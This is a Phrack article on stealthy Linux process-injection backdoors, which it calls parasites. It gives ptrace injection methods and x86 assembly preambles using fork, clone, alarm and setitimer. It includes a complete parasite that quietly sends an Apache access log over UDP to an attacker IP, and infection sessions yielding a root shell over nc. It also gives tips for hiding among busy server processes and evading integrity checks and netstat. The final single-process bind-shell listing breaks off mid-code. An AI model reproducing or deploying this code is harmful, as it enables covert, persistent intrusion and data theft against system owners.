Zines/phrack/68/9.txt

                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x09 of 0x13

|=-----------------------------------------------------------------------=|
|=---------------------=[ Single Process Parasite ]=---------------------=|
|=----------------=[ The quest for the stealth backdoor ]=---------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ by Crossbower ]=--------------------------=|
|=-----------------------------------------------------------------------=|

Index

------[ 0. Introduction
------[ 1. Brief discussion on injection methods
------[ 2. First generation: fork() and clone()
------[ 3. Second generation: signal()/alarm()
------[ 4. Third generation: setitimer()
------[ 5. Working parasites
------------[ 5.1 Process and thread backdoor
------------[ 5.2 Remote "tail follow" parasite
------------[ 5.3 Single process backdoor
------[ 6. Something about the injector
------[ 7. Further readings
------[ 8. Links and references

------[ 0. Introduction

In biology a parasite is an organism that grows, feeds, and live in a
different organism while contributing nothing to the survival of its host.

(There is another interesting definition that, even if it's less relevant,
I find funny: a professional dinner guest, especially in ancient Greece.
>From Greek parastos, person who eats at someone else's table,
parasite : para-,beside; stos, grain, food.)

So, without digressing too much, what do we mean by "parasite" in this
document? A parasite is simply some executable code that lives within
another process, but that was injected after its loading time, by a
third person/program.

Any process can become infected quite easily, using standard libraries
provided by operating systems (we will use process trace, ptrace [0]).

The real difficulty for the parasite is to coexist peacefully with the host
process, without killing it. For "death" of the host we also intend a
situation where, even if the process remains active, it is no longer
able to work properly, because its memory has been corrupted.

The of goal this document is to create a parasite that live and let live
the host process, as if nothing had happened.

Starting with simple techniques, and and gradually improving the parasite,
we'll reach a point where our creature is scheduled inside the process of
the host, without the need of fork() or similar calls (i.e. clone()).

An interesting question is: why a parasite is an excellent backdoor?

The simplest answer is that a parasite hides what is not permitted in what
is allowed, so that:
  - it's difficult to detect using conventional tools
  - it's more stable and easy to use than kernel-level rootkits.

If the target system has security tools that automatically monitor the
integrity of executable files, but that do not perform complete audits of
memory, the parasite will not trigger any alarm.

After this introduction we can dive into the problematic.

If you prefer practical examples, you can "jump" to paragraph 5,
which shows three different types of real parasite.

------[ 1. Brief discussion on injection methods

To separate the creation of the shellcode from the methods used to inject
it into the host process, this section will discuss how the parasite is
injected (in the examples of this document).

Unlike normal shellcode that, depending on the vulnerability exploited,
can not contain certain types of characters (e.g. NULLs), a parasite has
no particular restrictions.

It can contain any character, even NULL bytes, because ptrace [0] allows to
modify directly the .text section of a process.

The first question that arises regards where to place parasitic code.
This memory location must not be essential to the program, and should not
be invoked by the code after the start (or shortly after the start) of
the host process.

We can use run-time patching, but it's complicated technique and makes it
difficult to ensure the correct functioning of the process after the
manipulation. It is therefore not suitable for complex parasites.

The author has chosen to inject the code into the memory range of libdl.so
library, since it is used during the loading stage of programs but then
usually no longer necessary (more info: [1][2]).

Another reason for this choice is that the memory address of the library,
when loaded into the process, is exported in the /proc filesystem.

You can easily see that by typing:
$ cat /proc/self/maps
...
b7778000-b777a000 rw-p 00139000 fe:00 37071197   /lib/libc-2.7.so
b777a000-b777d000 rw-p b777a000 00:00 0
...
b7782000-b779c000 r-xp 00000000 fe:00 37071145   /lib/ld-2.7.so  <---
...

Libdl is mapped at the range b7782000-b779c000 and is executable. The
injected starting at the initial address of the range is perfectly
executable.

Some considerations about this method: if the infected program uses
dlopen(), dlclose() or dlsym() during its execution, some problems
could arise. The solution is to inject into the same library, but in
unused memory locations.
(From the tests of the author the initial memory locations of the library
are not critical and do not affect the execution of programs.)

There are other problems on linux systems that use the grsec kernel patch.
Using this patch the text segment of the host process  is marked
read/execute only and therefore will not be writable with ptrace.
If that's your case, Ryan O'Neill has published a very powerful
algorithm [3] that exploits sysenter instructions (used by the host's code)
to execute a serie of system calls (the algorithm is able to
allocate and set the correct permission on a new memory area without
modifying the text segment of the traced process).
I recommend everyone read the document, as it is very interesting.

The other premise, I want to do in this section, regards the basic
informations the injector (the program that injects the parasite) must
provide to the shellcode to restore the execution of the host program.

Our implementation of the injector gets the current EIP (Instruction
Pointer) of the host process, push it on the stack and writes in the EIP
the address of the parasite (injected into libdl).

The parasite, in its initialization part, saves every register it uses.
Then, at the end of its execution, every modified register is restored.
A simple way to do this is to push and pop the registers with the
instructions PUSHA and POPA.

After that, a simple RET instruction restores the execution of the host
process, since the its saved EIP is on the top of the stack.

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

parasite_skeleton:

    # preamble
    push %eax       # save registers
    push %ebx       # used by the shellcode

    # ...
    # shellcode
    # ...

    # epilogue
    pop %ebx        # restore modified registers
    pop %eax        # ...

    ret             # restore execution of the host

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

Another very useful information the injector provides to the shellcode,
is the address of a persistent memory location. In the case of this
document, the address is also taken from /proc/pid/maps:

...
b7701000-b771c000 r-xp 00000000 08:03 1261592    /lib/ld-2.11.1.so
b771c000-b771d000 r--p 0001a000 08:03 1261592    /lib/ld-2.11.1.so
b771d000-b771e000 rw-p 0001b000 08:03 1261592    /lib/ld-2.11.1.so <--
...

The range b771d000-b771e000 has read and write permission and it's
suitable for this purpose.

Other techniques exists to dynamically create writable and executable
memory locations, such as the use of mmap() in the host process. But these
techniques are beyond the scope of this article and will not be analyzed
here.

Since the necessary premises have been made, we can discuss the first
generation of our stealth parasite.

------[ 2. First generation: fork() and clone()

The simplest idea to allow the host process to continue its execution
properly and, at the same time, hide the parasite, is the use of the
fork() syscall (or the creation of a new thread, not analyzed here).

Using fork() the process is splitted in two:
 - the parent process (the original one) can continue its normal execution
 - the child process, instead, will execute the parasite

An important thing to note, is that the child process inherits the parent's
name and a copy of its memory.

This means that if we inject the parasite in the process "server1",
another process "server1" will be created as its child.

Before the injection:
# ps -A
...
...
 5478 ?        00:00:00 server1
...

After the injection:
# ps -A
...
...
 5478 ?        00:00:00 server1
 5479 ?        00:00:00 server1
...

If the host process is carefully chosen, the parasite will be very hard
to detect. Just think of some network services (such as apache2) that
generate a lot of children: a single child process is unlikely to be
detected.

The fork parasite can be implemented as a preamble preceding the real
shellcode:

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

fork_parasite:
    push %eax       # save %eax value (needed by parent process)

    push $2
    pop %eax
    int $0x80       # fork

    test %eax, %eax
    jz shellcode    # child:  jumps to shellcode

    pop %eax        # parent: restores host process execution
    ret

shellcode:          # append your shellcode here
    # ...
    # ...

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

The preamble simply makes a call to fork(), analyzes the results, and
decides the execution path to choose.

With this implementation, any existing shellcode can be turned into a
parasite: it's responsibility of the injector to concatenate the parts
before inserting them in the host.

A very similar technique uses clone() instead of fork(). We can consider
clone() a generalization of the fork() syscall through which it's possible
to create both processes and threads.

The difference is in the options passed to the syscall. A thread is
generated using particular flags:

  - CLONE_VM  the calling process and the child process run in the same
              memory space. Memory writes performed by the calling process
              or by the child process are also visible in the other
              process.
              Any memory mapping or unmapping performed by the child or
              the calling process also affects the other process.

  - CLONE_SIGHAND  the calling process and the child process share the same
                   table of signal handlers.

  - CLONE_THREAD  the child is placed in the same thread group as the
                  calling process.

The CLONE_THREAD flag is the most important: it is what distinguishes what
we call the "process" from what we call "thread" at least on linux systems.

Let's see how the clone() preamble is implemented:

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

clone_parasite:
    pusha           # save registers (needed by parent process)

    # call to sys_clone

    xorl    %eax, %eax
    mov     $120, %al

    movl     $0x18900, %ebx # flags: CLONE_VM|CLONE_SIGHAND|
                            #        CLONE_THREAD|CLONE_PARENT

    int     $0x80           # clone

    test %eax, %eax
    jz shellcode    # child:  jumps to shellcode

    popa            # parent: restores host process execution
    ret

shellcode:          # append your shellcode here
    # ...
    # ...

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

The code is based on the fork() preamble, and its behaviour is very
similar. The difference is in the result.

Before the injection (single threaded process):
# ps -Am
...
...
 8360 pts/3    00:00:00 server1
    - -        00:00:00 -
...

After the injection (an additional thread is created):
# ps -A
...
...
 8360 pts/3    00:00:00 server1
    - -        00:00:00 -
    - -        00:00:00 -
...

Surely the generation of a thread is more stealthy than the generation of a
process. However there is a small disadvantage, if the parasite thread
alters parts of the main thread can bring the host to a crash:
the use of the resources, that are shared, must be much more careful.

We have just seen how to create parasites executed as independent processes
or threads.

However, these types of parasites are not completely invisible. In some
circumstances, and in the case of particular (monitored) processes, the
generation of a child (process or thread) can be problematic or easily
detectable.

Therefore, in the next section, we will discuss in a different type of
parasite/preamble, deeply integrated with its host.

------[ 3. Second generation: signal()/alarm()

If we don't like the creation of another process to execute our parasite
we need some kind of time sharing mechanism inside a single process (did
you see the title of this document?)

It's a scheduling problem: when a new process is created, the operating
system takes care of assigning it time and resources necessary to its
execution.
If we don't want to rely on this mechanism, we have to simulate a scheduler
within a single process, to allow a concurrent execution of parasite and
host, using (usually) asynchronous events.

When you think of asynchronous events in a Unix-like system, the first
thing that comes to mind are signals.
If a process registers a handler for a specific signal, when the signal
is sent the operating system stops its normal execution and makes a
(void function) call to the handler.
When the handler returns, the execution of the process is restored.

There are several functions provided by the operating system to generate
signals. In this chapter we'll use alarm().

Alarm() arranges for a SIGALRM signal to be delivered to the calling
process when an arbitrary number of seconds has passed.
Its main limitation is that you can not specify time intervals shorter than
one second, but this is not a problem in most cases.

Our parasite/preamble needs to register itself as a handler for the signal
SIGALRM, and renew the timer every time it is executed, to be called at
regular intervals.
This creates a kind of scheduler within a single process, and there is no
the need to call fork() (or functions to create threads).

Here is our second generation parasite/preamble:

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

# signal/alarm parasite

handler:
    pusha
    # alarm(timeout)
    xorl    %eax, %eax
    xorl    %ebx, %ebx
    mov     $27, %al
    mov     $0x1, %bl    # 1 second
    int     $0x80

schedule:
    # signal(SIGALRM, handler)
    xorl    %eax, %eax
    xorl    %ebx, %ebx
    mov    $48, %al
    mov    $14, %bl
    jmp    schedule_end   # load schedule_end address
load_handler:
    pop    %ecx
    subl    $0x23, %ecx   # adjust %ecx to point handler()
    int    $0x80
    popa
    jmp    shellcode

schedule_end:
    call load_handler

shellcode:        # append your shellcode here
    # ...
    # ...

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

Of course the type of shellcode you can append to the preamble must
be aware of the "alternative" scheduling mechanism.

It must be able to split its operations between multiple calls, and must
also not take too much time to run a single step (i.e. a single call),
to not slow down the host program or overlap with the next handler call.

In short, a call to the handler (our parasite), to work properly must last
less than the timer interval.

However, alert() is not the only function able to simulate a scheduler.
In the next chapter we will see a more advanced function, which allows a
more granular control of the execution of the parasite.

------[ 4. Third generation: setitimer()

We've just arrived at the latest generation of the parasite.
In the first part of the chapter we'll spend some time to analyze the
function setitimer(), on which the code is based.

The definition of the function is:
int setitimer(int which, const struct itimerval *new_value,
                     struct itimerval *old_value);

As in the case of alarm(), the function setitimer() provides a mechanism
for a process to interrupt itself in the future using signals.
Unlike alarm, however, you can specify intervals of a few microseconds and
choose various types of timers and time domains.

The argument "int which" allows to choose the type of timer and therefore
the signal that will be sent to the process:

ITIMER_REAL    0x00  the most used timer, it decrements in real time, and
                     delivers SIGALRM upon expiration.

ITIMER_VIRTUAL 0x01  decrements only when the process is executing, and
                     delivers SIGVTALRM upon expiration.

ITIMER_PROF    0x02  decrements both when the process executes and when the
                     system is executing on behalf of the process. Coupled
                     with  ITIMER_VIRTUAL, this timer is usually used to
                     profile the time spent by the application in user and
                     kernel space.  SIGPROF is delivered upon expiration.

We will use ITIMER_REAL because it allows the generation of signal at
regular intervals, and is not influenced by environmental factors such as
the workload of a system.

The argument "const struct itimerval *new_value" points to an itimerval
structure, defined as:

struct itimerval {
    struct timeval it_interval; /* next value */
    struct timeval it_value;    /* current value */
};

struct timeval {
    long tv_sec;                /* seconds */
    long tv_usec;               /* microseconds */
};

The last timeval structure, it_value, is the period between the calling of
the function and the first timer interrupt. If zero, the alarm is disabled.

The second one, it_interval, is the period between successive timer
interrupts. If zero, the alarm will only be sent once.

We'll set both structures at the same time interval.

The last argument, "struct itimerval *old_value", if not NULL, will be set
by the function at the value of the previous timer. We'll not use this
feature.

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

# setitimer parasite

setitimer_hdr:
    pusha
    # sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL)
    xorl    %eax, %eax
    xorl    %ebx, %ebx
    xorl    %edx, %edx
    mov     $104, %al
    jmp     struct_itimerval # load itimervar structure
load_struct:
    pop     %ecx
    int     $0x80
    popa
    jmp     handler

struct_itimerval:
    call    load_struct
    # itimerval structure: you can modify the values
    # to set your time intervals
    .long    0x0       # seconds
    .long    0x5000    # microseconds
    .long    0x0       # seconds
    .long    0x5000    # microseconds

# signal handler, called by the timer
handler:
    pusha
    # signal(SIGALRM, handler)
    xorl    %eax, %eax
    xorl    %ebx, %ebx
    mov    $48, %al
    mov    $14, %bl
    jmp    handler_end   # load handler_end address
load_handler:
    pop    %ecx
    subl    $0x19, %ecx  # adjust %ecx to point handler()
    int    $0x80
    popa
    jmp    shellcode

handler_end:
    call load_handler

shellcode:        # append your shellcode here
    # ...
    # ...

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

The usage of this preamble is similar to the previous (alarm) one, there
is only the necessity of a fine-tuned timer: a compromise between the
frequency of executions and the stability of the parasite, which must be
able to carry out its operations in less time than a timer's cycle.

You can work around this problem by transforming these preambles
(including the preamble that makes use of alarm()) in epilogues, so that
the timer starts counting only after the parasite has finished its
operations.

In fact we are going to see how this was implemented in the real parasites
presented below.

------[ 5. Working parasites

Here we come to the practical part. Three working parasites will be
presented: one for each technique exposed in the theoretical part of the
document.

To inject the parasites the injector cymothoa [4] was used, written by the
same author, and which already includes the codes presented in the article.
Although it is possible, through various techniques, to inject shellcodes
in processes, the download of the program is recommended to try the
examples during the lecture.

------------[ 5.1 Process and thread backdoor

Our first real parasite is a backdoor created by applying, to pre-existing
shellcode, the fork() preamble.
The shellcode used was developed by izik (izik@tty64.org) and is
available on several sites [5]. For this reason will not be reported.

The shellcode is a classic exploit shellcode: it binds /bin/sh to a TCP
port and fork a shell for every connection.

Using it aided by an injector, has several advantages:
  - The ability to configure its behavior. In this case the possibility to
    choose the port to listen on.
  - The possibility of keeping the host alive using a one of the
    preamble shown earlier.
  - Not having to worry about memory locations necessary to the execution
    and data storage, since they are automatically provided.

Let's see in practice how this parasite works...

First, on the victim machine, we must identify a suitable host process.
In this example we will use an instance of cat, since it's really easy to
check if it continues its execution after the injection.

root@victim# ps -A | grep cat
 1727 pts/6    00:00:00 cat

We need this pid for the injection:

root@victim# cymothoa -p 1727 -s 1 -y 5555
[+] attaching to process 1727

 register info:
 -----------------------------------------------------------
 eax value: 0xfffffe00   ebx value: 0x0
 esp value: 0xbf81e1c8   eip value: 0xb78be430
 ------------------------------------------------------------

[+] new esp: 0xbf81e1c4
[+] payload preamble: fork
[+] injecting code into 0xb78bf000
[+] copy general purpose registers
[+] detaching from 1727

[+] infected!!!
root@victim#

The process is now infected: we should be able to see two cat instances,
the original one and the new one that corresponds to the parasite:

root@victim# ps -A | grep cat
 1727 pts/6    00:00:00 cat
 1842 pts/6    00:00:00 cat

If, from a different machine, we try to connect to the port 5555, we should
get a shell:

root@attacker# nc -vv victim 5555
Connection to victim 5555 port [tcp/*] succeeded!
uname -a
Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
whoami
root

At the same time, if we write a few lines in the console where the original
cat is running, we should see the usual output:

root@victim# cat
test123
test123
foo
foo

The backdoor function properly: the two processes are running at the same
time without crashing...

The same backdoor can also be injected in a similar way using the clone()
preamble, and thus running the parasite as a new thread instead of a new
process.

The command is similar, we only disable the fork() preamble and force
clone() instead:

root@victim# cymothoa -p 9425 -s 1 -y 5555 -F -b
[+] attaching to process 9425

 register info:
 -----------------------------------------------------------
 eax value: 0xfffffe00   ebx value: 0x0
 esp value: 0xbfb4beb8   eip value: 0xb78da430
 ------------------------------------------------------------

[+] new esp: 0xbfb4beb4
[+] payload preamble: thread
[+] injecting code into 0xb78db000
[+] copy general purpose registers
[+] detaching from 9425

[+] infected!!!

If we execute ps without special flags we now see only one process:

root@victim# ps -A | grep cat
 9425 pts/3    00:00:00 cat

But with the option -m we see an additional thread:

root@victim# ps -Am
...
 9425 pts/3    00:00:00 cat
    - -        00:00:00 -
    - -        00:00:00 -
...
...

Using netcat on the port 5555 of the victim machine works as expected.

Some notes on the proper use of the fork() and clone() preambles:
  - This preamble is compatible with virtually any existing shellcode,
    without any modification. It can be used to easily transform into
    parasitic code what you have already written.
    In the case of clone() preamble the situation is slightly more critical
    because there is the possibility that the parasite thread interferes
    with the host thread. However, widespread shellcodes are usually
    already attentive to these issues, and should not cause problems.
  - It is better to inject the parasite into servers that generate many
    child processes. Some of those tested by me are apache2, dhclient3 and,
    in the case of a desktop system, the processes of the window manager.
    It's hard to find a needle in a haystack, and it is difficult to tell
    a single parasite from dozens of apache2 processes ;)

------------[ 5.2 Remote "tail follow" parasite

Have you ever used tail with the "-f" (follow)  option? This mode is used
to monitor text files, usually logs, to see in real time the new lines
added by other processes.

Tail accepts as option a sleep interval, a waiting time between a
control of the file and another.

It's therefore natural, when writing a parasite with the same function, to
use a preamble that allows a precise control of time: the setitimer()
preamble.

This is the code of this new parasite... It is more complex than the
previous codes.
After the source there will be a brief explanation of its operations, and
finally an example of its practical use.

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<

#
# Scheduled tail setitimer parasite
#

#
# Preamble
#

setitimer_hdr:
	pusha
	# sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL)
	xorl    %eax, %eax
	xorl    %ebx, %ebx
	xorl    %edx, %edx
	mov     $104, %al
	jmp     struct_itimerval
load_struct:
	pop	%ecx
	int	$0x80
	popa
	jmp	handler

struct_itimerval:
	call	load_struct
	# these values are replaced by the injector:
	.long   0x0#53434553  # seconds
	.long   0x5343494d  # microseconds
	.long   0x0#53434553  # seconds
	.long   0x5343494d  # microseconds

handler:
	pusha
	# signal(SIGALRM, handler)
	xorl	%eax, %eax
	xorl	%ebx, %ebx
	mov	$48, %al
	mov	$14, %bl
	jmp	handler_end
load_handler:
	pop	%ecx
	subl	$0x19, %ecx # adjust %ecx to point handler()
	int	$0x80
	popa
	jmp	shellcode

handler_end:
	call load_handler
#
# The shellcode starts here
#

shellcode:
	pusha

	# check if already initialized
	mov     $0x4d454d50, %esi  # replaced by the injector
                                   # (persistent memory address)
	mov     (%esi), %eax
	cmp     $0xdeadbeef, %eax
	je      open_call          # jump if already initialized

	# initialize
	mov     $0xdeadbeef, %eax
	mov     %eax, (%esi)
	add     $4, %esi
	xorl    %eax, %eax
	mov     %eax, (%esi)
	sub     $4, %esi

open_call:
	# call to sys_open(file_path, O_RDONLY)
	xorl    %eax, %eax
	mov     $5, %al
	jmp     file_path
load_file_path:
	pop     %ebx
	xorl    %ecx, %ecx
	int     $0x80       # %eax = file descriptor
	mov     %eax, %edi  # save file descriptor

check_file_length:
	# call to sys_lseek(fd, 0, SEEK_END)
	mov     %edi, %ebx
	xorl    %eax, %eax
	mov     $19, %al
	xorl    %ecx, %ecx
	xorl    %edx, %edx
	mov     $2, %dl
	int     $0x80  # %eax = end of file offset (eof)

	# get old eof, and store new eof
	add     $4, %esi
	mov     (%esi), %ebx
	mov     %eax, (%esi)

	# skip the first read
	test    %ebx, %ebx
	jz      return_to_main_proc

	# check if file is larger
	# (current end of file > previous end of file)
	cmp     %eax, %ebx
	je      return_to_main_proc # eof not changed:
                                    # return to main process

calc_data_len:
	# calculate new data length
	# (current eof - last eof)
	mov     %eax, %esi
	sub     %ebx, %esi # saved in %esi

set_new_position:
	# call to sys_lseek(fd, last_eof, SEEK_SET)
	xorl    %eax, %eax
	mov     $19, %al
	mov     %ebx, %ecx
	mov     %edi, %ebx
	xorl    %edx, %edx
	int     $0x80  # %eax = last end of file offset

read_file_tail:
	# allocate buffer
	sub     %esi, %esp

	# call to sys_read(fd, buf, count)
	xorl    %eax, %eax
	mov     $3, %al
	mov     %edi, %ebx
	mov     %esp, %ecx
	mov     %esi, %edx
	int     $0x80       # %eax = bytes read
	mov     %esp, %ebp  # save pointer to buffer

open_socket:
	# call to sys_socketcall($0x01 (socket), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $0x01, %bl
	jmp     socket_args
load_socket_args:
	pop     %ecx
	int     $0x80  # %eax = socket descriptor
	jmp     send_data

socket_args:
	call load_socket_args
	.long	0x02	# AF_INET
	.long	0x02	# SOCK_DGRAM
	.long	0x00	# NULL

send_data:

	# prepare sys_socketcall (sendto) arguments
	jmp     struct_sockaddr
load_sockaddr:
	pop     %ecx
	push    $0x10   # sizeof(struct_sockaddr)
	push    %ecx    # struct_sockaddr address
	xorl    %ecx, %ecx
	push    %ecx    # flags
	push    %edx    # buffer len
	push    %ebp    # buffer pointer
	push    %eax    # socket descriptor

	# call to sys_sendto($11 (sendto), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $11, %bl
	mov     %esp, %ecx
	int     $0x80
	jmp     restore_stack

struct_sockaddr:
	call load_sockaddr
	.short	0x02        # AF_INET
	.short	0x5250      # PORT (replaced by the injector)
	.long	0x34565049  # DEST IP (replaced by the injector)

restore_stack:
	# restore stack
	pop     %ebx    # socket descriptor
	pop     %eax    # buffer pointer
	pop     %edx    # buffer len
	pop     %eax    # flags
	pop     %eax    # struct_sockaddr address
	pop     %eax    # sizeof(struct_sockaddr)

	# deallocate buffer
	add     %edx, %esp


close_socket:
	# call to sys_close(socket)
	xorl    %eax, %eax
	mov     $6, %al
	int     $0x80

return_to_main_proc:

	# call to sys_close(fd)
	xorl    %eax, %eax
	mov     $6, %al
	mov     %edi, %ebx
	int     $0x80

	# return
	popa
	ret

file_path:
	call load_file_path
	.ascii  "/var/log/apache2/access.log"

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

The code is not written in a super-compact way, since the space it's not
a problem and the ease of programming and modification has been preferred.

The code can be summarized in a few steps:
1) Preable (we already know).
2) Check to see if it's the first execution. This step makes use of a
   persistent memory location, provided by the injector.
3) File open and check of length.
4) Comparison with previous file's length.
4.1) If unchanged the parasite returns the execution to the host process.
4.2) If changed the execution continues.
5) Read the new lines of the file.
6) Send the new lines to the attacker via UDP
7) Restore the stack
8) Return the execution to the host process.

The shellcode receives several parameters from the injector: the address
of a persistent memory location, the attacker IP address and port, and the
microsecond interval for the timer.

The injector simply replaces known hexadecimal mark with these parameters
during the injection. You can see where the replacements occur looking
at the comments of the code.

Now on to the fun part: the practical use of the parasite.

The first thing to do is to prepare the server on the attacker's machine
to receive data. Inside the main directory of the injector is present a
simple implementation of UDP server.

You need only to specify an available port:

root@attacker# ./udp_server 5555
./udp_server: listening on port UDP 5555

Now we can move to the victim's machine, and choose suitable process.
For simplicity we will use cat again.

To inject the parasite we must specify some parameters:

root@victim# ./cymothoa -p `pidof cat` -s 14 -k 5000 -x attacker_ip -y 5555
[+] attaching to process 4694

 register info:
 -----------------------------------------------------------
 eax value: 0xfffffe00   ebx value: 0x0
 esp value: 0xbfa9f3f8   eip value: 0xb77e8430
 ------------------------------------------------------------

[+] new esp: 0xbfa9f3f4
[+] injecting code into 0xb77e9000
[+] copy general purpose registers
[+] persistent memory at 0xb7805000 (if used)
[+] detaching from 4694

[+] infected!!!

The process is now infected. No new process has been created.

Now, assuming an apache2 server is running, we can try to make some
requests to the server to update /var/log/apache2/access.log (the file
we are monitoring).

root@attacker# curl victim_ip
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added.</p>
</body></html>

If everything worked properly we should see, in the console of the UDP
server UDP, the new lines generated by our requests:

root@attacker# ./udp_server 5555
./udp_server: listening on port UDP 5555
::1 - - [26/May/2011:11:18:57 +0200] "GET / HTTP/1.1" 200 460 "-"
"curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k
zlib/1.2.3.3 libidn/1.15"
::1 - - [26/May/2011:11:19:26 +0200] "GET / HTTP/1.1" 200 460 "-"
"curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k
zlib/1.2.3.3 libidn/1.15"
...

Et voila, we have a remote file sniffer!

Of course the connections do not appear in the output of tools like
netstat, as they are only brief exchanges of data, and sockets are open
only when the monitored file has new lines (and immediately closed).

Some notes on the proper use of this preamble and parasite:
  - This preamble is usually not compatible with virtually existing
    shellcode. The code must be modified to return the execution to the
    host process, restoring stack and registers.
  - It is better to inject the parasite into servers that run all the time
    the machine is on, but do not use processor very much. The server
    dhclient3 is a perfect host.

------------[ 5.3 Single process backdoor

We have just arrived at the last and perhaps most interesting example of
parasite of this document.
That's what the author wanted to obtain: a backdoor that can live within
another process, without calls to fork() and without creating new threads.

The backdoor listens on a port (customizable by the injector), and
periodically checks if a client is connected. This part has been
implemented using nonblocking sockets and a modified alarm() preamble.

When a client is connected, it obtains a shell: the only time a call
to fork() is made.

As long as the backdoor is in listening mode, the only way to notice its
presence is to check the listening ports on the machine, but even in this
case we can use some tricks to make our parasite very difficult to detect.

Here's the code.

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

#
# Single process backdoor (alarm preamble)
#

handler:
	pusha

set_signal_handler:
	# signal(SIGALRM, handler)
	xorl	%eax, %eax
	xorl	%ebx, %ebx
	mov	$48, %al
	mov	$14, %bl
	jmp	set_signal_handler_end
load_handler:
	pop	%ecx
	subl	$0x18, %ecx # adjust %ecx to point handler()
	int	$0x80
	jmp	shellcode

set_signal_handler_end:
	call load_handler

shellcode:
	# check if already initialized
	mov     $0x4d454d50, %esi  # replaced by the injector
                                   # (persistent memory address)
	mov     (%esi), %eax
	cmp     $0xdeadbeef, %eax
	je      accept_call        # jump if already initialized

socket_call:
	# call to sys_socketcall($0x01 (socket), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $0x01, %bl
	jmp     socket_args
load_socket_args:
	pop     %ecx
	int     $0x80 # %eax = socket descriptor

	# save socket descriptor
	mov     $0xdeadbeef, %ebx
	mov     %ebx, (%esi)
	add     $4, %esi
	mov     %eax, (%esi)
	sub     $4, %esi
	jmp     fcntl_call

socket_args:
	call load_socket_args
	.long	0x02	# AF_INET
	.long	0x01	# SOCK_STREAM
	.long	0x00	# NULL

fcntl_call:
	# call to sys_fcntl(socket, F_GETFL)
	mov     %eax, %ebx
	xorl    %eax, %eax
	mov     $55, %al
	xorl    %ecx, %ecx
	mov     $3, %cl
	int     $0x80
	# call to sys_fcntl(socket, F_SETFL, flags | O_NONBLOCK)
	mov     %eax, %edx
	xorl    %eax, %eax
	mov     $55, %al
	mov     $4, %cl
	orl     $0x800, %edx  # O_NONBLOCK (nonblocking socket)
	int     $0x80

bind_call:
	# prepare sys_socketcall (bind) arguments
	jmp     struct_sockaddr
load_sockaddr:
	pop     %ecx
	push    $0x10   # sizeof(struct_sockaddr)
	push    %ecx    # struct_sockaddr address
	push    %ebx    # socket descriptor

	# call to sys_socketcall($0x02 (bind), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $0x02, %bl
	mov     %esp, %ecx
	int     $0x80
	jmp     listen_call

struct_sockaddr:
	call load_sockaddr
	.short	0x02	# AF_INET
	.short	0x5250	# PORT (replaced by the injector)
	.long	0x00	# INADDR_ANY

listen_call:
	pop     %eax    # socket descriptor
	pop     %ebx
	push    $0x10   # queue (backlog)
	push    %eax    # socket descriptor

	# call to sys_socketcall($0x04 (listen), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $0x04, %bl
	mov     %esp, %ecx
	int     $0x80

	# restore stack
	pop     %edi
	pop     %edi
	pop     %edi

accept_call:
	# prepare sys_socketcall (accept) arguments
	xorl    %ecx, %ecx
	push    %ecx         # socklen_t *addrlen
	push    %ecx         # struct sockaddr *addr
	add     $4, %esi
	push    (%esi)       # socket descriptor

	# call to sys_socketcall($0x05 (accept), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $0x05, %bl
	mov     %esp, %ecx
	int     $0x80       # %eax = file descriptor or negative (on error)
	mov     %eax, %edx  # save file descriptor

	# restore stack
	pop     %edi
	pop     %edi
	pop     %edi

	# check return value
	test    %eax, %eax
	js      schedule_next_and_return  # jump on error (negative %eax)


fork_child:
	# call to sys_fork()
	xorl    %eax, %eax
	mov     $2, %al
	int     $0x80

	test    %eax, %eax
	jz      dup2_multiple_calls  # child continue execution
	                             # parent schedule_next_and_return

schedule_next_and_return:

